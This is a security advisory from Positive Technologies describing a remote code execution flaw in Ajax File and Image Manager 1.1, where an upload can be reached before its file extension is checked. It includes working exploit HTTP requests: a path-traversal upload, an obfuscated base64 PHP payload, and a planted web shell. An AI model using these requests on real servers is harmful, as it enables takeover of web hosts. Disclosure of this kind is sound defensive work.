PT-2013-41: Arbitrary Code Execution in Ajax File and Image Manager

(PT-2013-41) Positive Technologies Security Advisory
Arbitrary Code Execution in Ajax File and Image Manager

Vulnerable software

Ajax File and Image Manager
Version: 1.1 and earlier

Link:
http://www.phpletter.com/DOWNLOAD/

Severity level

Severity level: High
Impact: Arbitrary Code Execution
Access Vector: Remote

CVSS v2:
Base Score: 10
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVE: not assigned

Software description

Ajax file and Image Manager is an open source file manager, which employs Ajax and PHP. It can be used as a standalone web application, as well as the TinyMCE/FCKeditor plugin.

Vulnerability description

The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager.

Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its extension is not allowed by whitelist. Thus, you can refer to the uploaded file before its removal, resulting in arbitrary code execution.

Vulnerability exploitation example:

Send the following requests simultaneously:

1)

POST  /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/  HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------307211690811
Content-Length: 613

-----------------------------307211690811
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php
eval(base64_decode("JGZwID0gZm9wZW4oIi5odGFjY2VzcyIsICJ3Iik7CiRodGFjY2VzcyA9ICc8RmlsZXNNYXRjaCAi
LihwaHApJCI+CkFsbG93IGZyb20gYWxsCjwvRmlsZXNtYXRjaD4nOwokdGVzdCA9IGZ3cml0ZSgk
ZnAsICRodGFjY2Vzcyk7CmZjbG9zZSgkZnApOwojaWYoZmlsZV9leGlzdHMoIjIucGhwIikpIHtk
aWUoKTt9CiRmcDEgPSBmb3BlbigiMi5waHAiLCAidyIpOwokY29kZSA9ICc8P3BocCBldmFsKCRf
UkVRVUVTVFtjXSk7ID8+JzsKJHRlc3QgPSBmd3JpdGUoJGZwMSwgJGNvZGUpOwpmY2xvc2UoJGZw
MSk7"));
?>
-----------------------------307211690811—

2)
POST  /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/  HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------307211690811
Content-Length: 240

-----------------------------307211690811
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch ".(php)$">
Allow from all
</FilesMatch>
-----------------------------307211690811—

3)
GET /targethost/images/banner/1.php  HTTP/1.1
Host: localhost
Connection: keep-alive

This will also create the following files in the /targethost/images/banner directory:
.htaccess with

<FilesMatch ".(php)$">
Allow from all
</Filesmatch>

and 2.php with
<?php eval($_REQUEST[c]); ?>.

How to fix

No solution

Advisory status

20.06.2013 - Vendor gets vulnerability details
04.09.2013 - Vulnerability details were sent to CERT
17.09.2013 - Public disclosure

Credits

The vulnerability was detected by Ilya Krupenko, Positive Research Center (Positive Technologies Company)

References

http://en.securitylab.ru/lab/PT-2013-41

Reports on the vulnerabilities previously discovered by Positive Research:

http://www.ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/

About Positive Technologies

Positive Technologies is a leading provider of vulnerability assessment, compliance management and threat analysis solutions to more than 1,000 global enterprise clients. Our solutions work seamlessly across your entire business: securing applications in development; assessing your network and application vulnerabilities; assuring compliance with regulatory requirements; and blocking real-time attacks.  Our commitment to clients and research has earned Positive Technologies a reputation as one of the foremost authorities on SCADA, Banking, Telecom, Web Application and ERP security, and distinction as the #1 fastest growing Security and Vulnerability Management firm in 2012, as shown in an IDC report*. To learn more about Positive Technologies please visit www.ptsecurity.com

*Source: IDC Worldwide Security and Vulnerability Management 2013-2017 Forecast and 2012 Vendor Shares, doc #242465, August 2013. Based on year-over-year revenue growth in 2012 for vendors with revenues of $20M+

Cisco IOS Software Resource Reservation Protocol Interface Queue Wedge Vulnerability

A vulnerability in the Resource Reservation Protocol (RSVP) feature of Cisco IOS Software an...

30 september, 2013

Cisco IOS Software Internet Key Exchange Memory Leak Vulnerability

A vulnerability in the Internet Key Exchange (IKE) protocol of Cisco IOS Software and Cisco ...

30 september, 2013

Cisco IOS Software Multicast Network Time Protocol Denial of Service Vulnerability

A vulnerability in the implementation of the Network Time Protocol (NTP) feature in Cisco IO...

30 september, 2013

MS14-035: Cumulative Security Update for Internet Explorer (2969262)

This security update resolves two publicly disclosed vulnerabilities and fifty-seven privately repor...

11 june, 2014

MS14-036: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (2967487)

This security update resolves two privately reported vulnerabilities in Microsoft Windows, Microsoft...

11 june, 2014

MS14-034: Vulnerability in Microsoft Word Could Allow Remote Code Execution (2969261)

This security update resolves one privately reported vulnerability in Microsoft Office.

10 june, 2014

This Alert covers CVE-2010-0896 for the mail component of the Sun Convergence product

This Sun Alert covers CVE-2010-0896 for the mail component of the Sun Convergence product.

14 april, 2010

This Alert Covers CVE-2010-0893 for the Mail Component of the Sun Convergence Product

This Alert covers CVE-2010-0893 for the mail component of the Sun Convergence product.

14 april, 2010

SunOS 5.10_x86: ucode driver patch

6905530 processor microcode code can panic when retrieving microcode revision.

02 february, 2010